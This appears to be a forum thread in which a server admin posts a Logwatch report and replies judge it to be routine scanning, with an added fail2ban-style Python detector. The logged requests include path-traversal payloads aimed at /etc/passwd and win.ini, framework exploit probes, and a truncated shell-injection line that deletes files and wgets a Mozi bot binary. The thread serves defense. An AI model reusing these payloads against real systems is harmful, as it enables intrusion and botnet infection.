The Logwatch analysis of my server. Do you see any successful break-in attempts here?

 ################### Logwatch 7.4.3 (12/07/16) ####################
        Processing Initiated: Tue Jan 28 04:27:15 2020
        Date Range Processed: yesterday
                              ( 2020-Jan-27 )
                              Period is day.
      Detail Level of Output: 0
      Type of Output/Format: mail / text
           Logfiles for Host: domain.com
 ##################################################################

 --------------------- Dovecot Begin ------------------------

 Dovecot IMAP and POP3 Successful Logins: 81
 Dovecot disconnects:
     100 Total

 **Unmatched Entries**
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1053, sent=12893: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1101, sent=13089: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1233, sent=13570: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1253, sent=6024: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1257, sent=13692: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1266, sent=6064: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1266, sent=6080: 2 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1266, sent=6082: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1279, sent=6128: 2 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1279, sent=6138: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1293, sent=13821: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1638, sent=15790: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1651, sent=15814: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1664, sent=15886: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1677, sent=15956: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1689, sent=8321: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1703, sent=15998: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1729, sent=16156: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1767, sent=8609: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1780, sent=8685: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1794, sent=16342: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1820, sent=16462: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1859, sent=16628: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1885, sent=16670: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1897, sent=9105: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1911, sent=16798: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1949, sent=9317: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1988, sent=9425: 2 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=199, sent=8141: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2002, sent=17110: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2014, sent=9557: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2041, sent=17278: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2080, sent=17444: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2093, sent=17492: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2113, sent=22203: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2132, sent=17614: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2145, sent=21894: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2171, sent=17758: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2221, sent=21732: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2241, sent=22255: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2245, sent=22075: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2254, sent=22312: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2309, sent=52285: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2322, sent=22370: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=235, sent=8274: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=235, sent=8282: 3 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2369, sent=22763: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2369, sent=23023: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2369, sent=52739: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2401, sent=22910: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2433, sent=23022: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2434, sent=53437: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2446, sent=23065: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=253, sent=9101: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2533, sent=53120: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2566, sent=70973: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2616, sent=25579: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2618, sent=52960: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=266, sent=9089: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2860, sent=41487: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=3012, sent=54370: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=3333, sent=144816: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=374, sent=9520: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=517, sent=10195: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=566, sent=10280: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=580, sent=2712: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=602, sent=10421: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=604, sent=2806: 5 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=849, sent=12066: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=854, sent=11408: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=921, sent=12368: 1 Time(s)
    dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=933, sent=12431: 1 Time(s)
    dovecot: service=lda, user=neu@domain.com, ip=[]. msgid=<1190434253.817170.1580146479563.JavaMail.ebayk@kcron47-1.mobile.rz>: saved mail to INBOX: 1 Time(s)
    dovecot: service=lda, user=neu@domain.com, ip=[]. msgid=<20200127032747.E184923C9A@domain.com>: saved mail to INBOX: 1 Time(s)
    dovecot: service=lda, user=neu@domain.com, ip=[]. msgid=<20200127190117.299A22B909@domain.com>: saved mail to INBOX: 1 Time(s)
    dovecot: service=lda, user=neu@domain.com, ip=[]. msgid=<589951437.805719.1580146445828.JavaMail.ebayk@kcron47-1.mobile.rz>: saved mail to INBOX: 1 Time(s)
    dovecot: service=lda, user=neu@domain.com, ip=[]. msgid=? <MN2PR20MB2590CCDFEE36F585F2599A54B90B0@MN2PR20MB2590.namprd20.prod.outlook.com>: saved mail to INBOX: 1 Time(s)

 ---------------------- Dovecot End -------------------------

 --------------------- httpd Begin ------------------------

 Connection attempts using mod_proxy:
    222.186.19.221 -> ip.ws.126.net:443: 1 Time(s)

 A total of 14 sites probed the server
    107.77.208.131
    174.246.134.40
    185.156.177.234
    185.210.219.156
    188.25.92.121
    203.59.158.219
    214.3.138.230
    216.10.217.24
    70.93.216.133
    73.42.134.193
    75.35.113.245
    80.255.10.194
    83.175.83.91
    95.9.158.68

 Requests with error response codes
    400 Bad Request
       /: 8 Time(s)
       %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e ... winnt%5cwin.ini: 2 Time(s)
       ../../../../../../../../../../../../windows/win.ini: 2 Time(s)
       ../../../../../../../../../../../../winnt/win.ini: 2 Time(s)
       ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini: 2 Time(s)
       ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini: 2 Time(s)
       .\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/windows/win.ini: 2 Time(s)
       .\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/winnt/win.ini: 2 Time(s)
       /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e ... e%2e/etc/passwd: 2 Time(s)
       /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e ... e/winnt/win.ini: 2 Time(s)
       /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e ... windows/win.ini: 2 Time(s)
       /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%u ... e/winnt/win.ini: 2 Time(s)
       /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%u ... ff0e/etc/passwd: 2 Time(s)
       /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%u ... windows/win.ini: 2 Time(s)
       /../../../../../../../../../../../../etc/passwd: 2 Time(s)
       /../../../../../../../../../../../../windows/win.ini: 2 Time(s)
       /../../../../../../../../../../../../winnt/win.ini: 2 Time(s)
       /./../../../../../../../../../../../etc/passwd: 2 Time(s)
       /././././././../../../../../etc/passwd: 2 Time(s)
       /././././././../../../../../windows/win.ini: 2 Time(s)
       /././././././../../../../../winnt/win.ini: 2 Time(s)
       //../../../../../../../../../../../../etc/passwd: 2 Time(s)
       null: 1 Time(s)
    404 Not Found
       /robots.txt: 51 Time(s)
       /modules/base/js/owa.tracker-combined-min.js: 10 Time(s)
       /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2 ... 2e%2fetc/passwd: 2 Time(s)
       /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2 ... ndows%5cwin.ini: 2 Time(s)
       /%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\% ... \winnt\\win.ini: 2 Time(s)
       /%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\% ... indows\\win.ini: 2 Time(s)
       /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..% ... ndows%2fwin.ini: 2 Time(s)
       /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..% ... winnt%2fwin.ini: 2 Time(s)
       /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..% ... ndows%5cwin.ini: 2 Time(s)
       /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..% ... nnt%5cwin%2eini: 2 Time(s)
       /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..% ... ows%5cwin%2eini: 2 Time(s)
       /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..% ... winnt%5cwin.ini: 2 Time(s)
       /%80../%80../%80../%80../%80../%80../windows/win.ini: 2 Time(s)
       /%80../%80../%80../%80../%80../%80../winnt/win.ini: 2 Time(s)
       /%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c ... e/winnt/win.ini: 2 Time(s)
       /%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c ... windows/win.ini: 2 Time(s)
       /%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.% ... windows/win.ini: 2 Time(s)
       /%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./winnt/win.ini: 2 Time(s)
       /.%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f.. ... ..%2fetc/passwd: 2 Time(s)
       /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f. ... ..%2fetc/passwd: 2 Time(s)
       /..../..../..../..../..../..../..../..../. ... ..../etc/passwd: 2 Time(s)
       /..../..../..../..../..../..../..../..../. ... windows/win.ini: 2 Time(s)
       /..../..../..../..../..../..../..../..../..../winnt/win.ini: 2 Time(s)
       /....\\....\\....\\....\\....\\....\\....\ ... \winnt\\win.ini: 2 Time(s)
       /....\\....\\....\\....\\....\\....\\....\ ... indows\\win.ini: 2 Time(s)
       /.../.../.../.../.../.../.../.../.../windows/win.ini: 2 Time(s)
       /.../.../.../.../.../.../.../.../.../winnt/win.ini: 2 Time(s)
       /...\\...\\...\\...\\...\\...\\...\\...\\. ... indows\\win.ini: 2 Time(s)
       /...\\...\\...\\...\\...\\...\\...\\...\\...\\winnt\\win.ini: 2 Time(s)
       /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini: 2 Time(s)
       /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini: 2 Time(s)
       /.cobalt: 2 Time(s)
       /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./windows/win.ini: 2 Time(s)
       /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini: 2 Time(s)
       /Adminbaecd655/Login.php: 2 Time(s)
       /DizDrwsQtDzJ.asp: 2 Time(s)
       /DizDrwsQtDzJ.cfm: 2 Time(s)
       /DizDrwsQtDzJ.cgi: 2 Time(s)
       /DizDrwsQtDzJ.html: 2 Time(s)
       /DizDrwsQtDzJ.inc: 2 Time(s)
       /DizDrwsQtDzJ.php: 2 Time(s)
       /DizDrwsQtDzJ.php3: 2 Time(s)
       /DizDrwsQtDzJ.pl: 2 Time(s)
       /DizDrwsQtDzJ.sh: 2 Time(s)
       /DizDrwsQtDzJ.shtml: 2 Time(s)
       /Home.do: 2 Time(s)
       /MSWSMTP/Common/Authentication/Logon.aspx: 2 Time(s)
       /admin.back: 2 Time(s)
       /ads.txt: 2 Time(s)
       /cgi-bin/DizDrwsQtDzJ.asp: 2 Time(s)
       /cgi-bin/DizDrwsQtDzJ.cfm: 2 Time(s)
       /cgi-bin/DizDrwsQtDzJ.cgi: 2 Time(s)
       /cgi-bin/DizDrwsQtDzJ.html: 2 Time(s)
       /cgi-bin/DizDrwsQtDzJ.inc: 2 Time(s)
       /cgi-bin/DizDrwsQtDzJ.php: 2 Time(s)
       /cgi-bin/DizDrwsQtDzJ.php3: 2 Time(s)
       /cgi-bin/DizDrwsQtDzJ.pl: 2 Time(s)
       /cgi-bin/DizDrwsQtDzJ.sh: 2 Time(s)
       /cgi-bin/DizDrwsQtDzJ.shtml: 2 Time(s)
       /commoncgi/servlet/CCGIServlet?ApHost=PDT_ ... File=logout.htm: 2 Time(s)
       /file: 2 Time(s)
       /header.php?tab=status: 2 Time(s)
       /index.php?s=/Index/\\think\\app/invokefun ... ]=HelloThinkPHP: 2 Time(s)
       /intruvert/jsp/admin/Login.jsp: 2 Time(s)
       /login.html: 2 Time(s)
       /nessus\\..\\..\\..\\..\\..\\..\\windows\\win.ini: 2 Time(s)
       /nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini: 2 Time(s)
       /properties/configuration.php?tab=Status: 2 Time(s)
       /properties/description.dhtml: 2 Time(s)
       /scripts/DizDrwsQtDzJ.asp: 2 Time(s)
       /scripts/DizDrwsQtDzJ.cfm: 2 Time(s)
       /scripts/DizDrwsQtDzJ.cgi: 2 Time(s)
       /scripts/DizDrwsQtDzJ.html: 2 Time(s)
       /scripts/DizDrwsQtDzJ.inc: 2 Time(s)
       /scripts/DizDrwsQtDzJ.php: 2 Time(s)
       /scripts/DizDrwsQtDzJ.php3: 2 Time(s)
       /scripts/DizDrwsQtDzJ.pl: 2 Time(s)
       /scripts/DizDrwsQtDzJ.sh: 2 Time(s)
       /scripts/DizDrwsQtDzJ.shtml: 2 Time(s)
       /scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2 ... e/winnt/win.ini: 2 Time(s)
       /scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2 ... windows/win.ini: 2 Time(s)
       /scripts/fake.cgi?arg=/dir/%2e%2e/%2e%2e/% ... e%2e/etc/passwd: 2 Time(s)
       /scripts/fake.cgi?arg=/dir/../../../../../ ... ./winnt/win.ini: 2 Time(s)
       /scripts/fake.cgi?arg=/dir/../../../../../ ... windows/win.ini: 2 Time(s)
       /scripts/fake.cgi?arg=/dir/../../../../../../etc/passwd: 2 Time(s)
       /sitemap.xml: 2 Time(s)
       /solr/admin/info/system?wt=json: 2 Time(s)
       /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
       /wavemaster.internal: 2 Time(s)
       /xmldata?item=All: 2 Time(s)
       /.well-known/assetlinks.json: 1 Time(s)
       //MyAdmin/scripts/setup.php: 1 Time(s)
       //myadmin/scripts/setup.php: 1 Time(s)
       //phpMyAdmin/scripts/setup.php: 1 Time(s)
       //phpmyadmin/scripts/setup.php: 1 Time(s)
       //pma/scripts/setup.php: 1 Time(s)
       /ControlManager/default.htm: 1 Time(s)
       /muieblackcat: 1 Time(s)
       /search/tsc.php?200=MzMwMTU0NjA4&21=NjYuMj ... 5bc36c22f3&cv=1: 1 Time(s)
       /shell?cd+/tmp;rm+-rf+*;wget+http://42.235 ... tmp/Mozi.a+jaws: 1 Time(s)
       /sonne: 1 Time(s)
    405 Method Not Allowed
       ip.ws.126.net:443: 1 Time(s)
    408 Request Timeout
       null: 13 Time(s)
       /HNAP1/: 1 Time(s)
    501 Not Implemented
       /: 2 Time(s)

 ---------------------- httpd End -------------------------

 --------------------- HTTPD Errors Begin ------------------------

 Level error : 59 Time(s)

 ---------------------- HTTPD Errors End -------------------------

 --------------------- Postfix Begin ------------------------

    22801   SASL authentication failed                         22,801
     2415   Miscellaneous warnings                              2,415

   2.549M   Bytes accepted                                  2,673,292
 477.042K   Bytes sent via SMTP                               488,491
 180.229K   Bytes delivered                                   184,555
 ========   ==================================================

      521   Accepted                                           98.67%
        7   Rejected                                            1.33%
 --------   --------------------------------------------------
      528   Total                                             100.00%
 ========   ==================================================

        7   5xx Reject relay denied                           100.00%
 --------   --------------------------------------------------
        7   Total 5xx Rejects                                 100.00%
 ========   ==================================================

    23546   Connections                                        23,546
      705   Connections lost (inbound)                            705
       34   Connections lost (outbound)                            34
    23545   Disconnections                                     23,545
     1020   Removed from queue                                  1,020
        5   Delivered                                               5
       90   Sent via SMTP                                          90
      340   Deferred                                              340
     5983   Deferrals                                           5,983
      537   Bounced (local)                                       537
      349   Bounced (remote)                                      349
       39   Expired and returned to sender                         39
      514   Notifications sent                                    514
     7056   Connection failures (outbound)                      7,056
        6   Timeouts (inbound)                                      6
        5   DNS lookup errors                                       5
      182   Hostname verification errors (FCRDNS)                 182
        9   SMTP protocol violations                                9
       12   PIX workaround enabled                                 12

 ---------------------- Postfix End -------------------------

 --------------------- Connections (secure-log) Begin ------------------------

 **Unmatched Entries**
    wordpress(www.domain.com): Authentication failure for uname from 18.219.157.95: 1 Time(s)
    wordpress(www.domain.com): Authentication failure for uname from 5.188.62.147: 2 Time(s)

 ---------------------- Connections (secure-log) End -------------------------

 ###################### Logwatch End #########################
Looks to me like normal background noise, ordinary script attacks. You wouldn't see successful attacks in these logs at all, because only the blocked ones are listed. The protection consists of having patched the software being attacked (e.g. phpMyAdmin) or choosing the directories on the server so that scanners of this kind don't find them in the first place. /phpmyadmin or /admin/phpmyadmin probably gets attacked a lot; no scanner is going to look for /kackakacka/phpmyadmin any time soon. What I like best about this sort of thing is a long list of targets in the access log, complete with 404 errors. Nothing found, script kiddies unfortunately have to stay outside, awww...
Pete wrote:
> The Logwatch analysis of my server. Do you see any successful
> break-in attempts here?

Attempts happen constantly, even on IPv4 addresses that have never been used. But as long as it consistently ends in HTTP 400 or an authentication failure, it stays an attempt.
Just hook up a fail2ban and feed it the relevant log files (and, if needed, custom filters). Blocked IP addresses then won't get a connection at all for a while.
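As an added example for the two points above, the 404-filled scanner lists in the access log and the fail2ban suggestion (this is not code from the thread and not fail2ban's own code): a small Python script that applies two fail2ban-style filters, one for the wp-fail2ban "Authentication failure ... from <IP>" lines in the secure log and one for 404 responses to traversal-looking request paths in an Apache access log, over constructed sample lines, and then applies a maxretry/findtime window the way a jail would. The filter regexes, the sample lines, the thresholds and the RFC 5737 addresses are all assumptions made for the example.

```python
"""Fail2ban-style failure counting over constructed log lines.

Added example, not fail2ban's own code and not part of the thread. The filter
patterns follow fail2ban's convention of writing a <HOST> placeholder where the
offending address appears; everything else (sample lines, thresholds,
RFC 5737 addresses, filter names) is an assumption made for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# fail2ban expands <HOST> itself; here it becomes a named IPv4 capture group.
HOST = r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})"


def compile_failregex(pattern: str) -> re.Pattern:
    """Expand the fail2ban <HOST> token and compile the resulting regex."""
    return re.compile(pattern.replace("<HOST>", HOST))


# Filter 1: the wp-fail2ban style lines seen in the report's secure-log section.
WP_AUTH = compile_failregex(
    r"wordpress\([^)]*\): Authentication failure for \S+ from <HOST>")

# Filter 2: Apache combined-format access log with a 404 response; the request
# path is then checked for traversal markers like those in the report's lists.
APACHE_404 = compile_failregex(
    r'^<HOST> \S+ \S+ \[(?P<ts>[^\]]+)\] "(?:GET|POST|HEAD) (?P<path>\S+) [^"]*" 404 ')
TRAVERSAL = re.compile(r"\.\.|%2e%2e|%c0%2e|%uff0e|%5c|win\.ini|etc/passwd", re.I)

# Constructed sample input: three WordPress login failures from one address within
# 20 seconds, one failure from another, a traversal scanner, and a benign visitor.
SECURE_LOG = """\
Jan 27 10:15:01 host wordpress(www.domain.com): Authentication failure for uname from 192.0.2.10
Jan 27 10:15:09 host wordpress(www.domain.com): Authentication failure for uname from 192.0.2.10
Jan 27 10:15:20 host wordpress(www.domain.com): Authentication failure for uname from 192.0.2.10
Jan 27 11:40:33 host wordpress(www.domain.com): Authentication failure for uname from 192.0.2.55
"""
ACCESS_LOG = """\
203.0.113.7 - - [27/Jan/2020:03:12:01 +0100] "GET /../../../../etc/passwd HTTP/1.1" 404 196 "-" "-"
203.0.113.7 - - [27/Jan/2020:03:12:02 +0100] "GET /%2e%2e/%2e%2e/winnt/win.ini HTTP/1.1" 404 196 "-" "-"
203.0.113.7 - - [27/Jan/2020:03:12:03 +0100] "GET /..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 196 "-" "-"
198.51.100.9 - - [27/Jan/2020:08:00:00 +0100] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.9 - - [27/Jan/2020:08:00:01 +0100] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""


def parse_syslog_ts(line: str, year: int = 2020) -> datetime:
    """Syslog lines carry no year; the caller supplies it (assumed 2020 here)."""
    return datetime.strptime(f"{year} {line[:15]}", "%Y %b %d %H:%M:%S")


def parse_apache_ts(stamp: str) -> datetime:
    """'27/Jan/2020:03:12:01 +0100' -> naive local time, to match the syslog side."""
    return datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)


def collect_failures(secure_log: str, access_log: str) -> list:
    """Return (ip, timestamp, filter_name) for every line one of the filters matches."""
    events = []
    for line in secure_log.splitlines():
        m = WP_AUTH.search(line)
        if m:
            events.append((m.group("host"), parse_syslog_ts(line), "wp-auth"))
    for line in access_log.splitlines():
        m = APACHE_404.match(line)
        if m and TRAVERSAL.search(m.group("path")):
            events.append((m.group("host"), parse_apache_ts(m.group("ts")), "traversal-404"))
    return events


def decide_bans(events, maxretry: int = 3, findtime: timedelta = timedelta(minutes=10)) -> dict:
    """Mimic a jail: ban an address once maxretry matches fall within findtime.

    Returns {ip: timestamp of the match that triggered the ban}."""
    by_ip = defaultdict(list)
    for ip, ts, _ in events:
        by_ip[ip].append(ts)
    banned = {}
    for ip, stamps in by_ip.items():
        stamps.sort()
        for i, ts in enumerate(stamps):
            in_window = [s for s in stamps[: i + 1] if s >= ts - findtime]
            if len(in_window) >= maxretry:
                banned[ip] = ts
                break
    return banned


if __name__ == "__main__":
    found = collect_failures(SECURE_LOG, ACCESS_LOG)
    for ip, ts, name in found:
        print(f"{ts}  {name:14s} {ip}")
    for ip, ts in decide_bans(found).items():
        print(f"ban {ip} (triggered at {ts})")
```

The benign visitor's single 404 on /robots.txt never counts, because the second filter requires a traversal marker in the path, not just the status code; that is the distinction worth keeping when writing a real fail2ban filter for the access log, otherwise ordinary crawlers get banned along with the scanners.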
Pete wrote:
> The Logwatch analysis of my server. Do you see any successful
> break-in attempts here?

If you don't understand these lines, maybe you shouldn't be running a public one.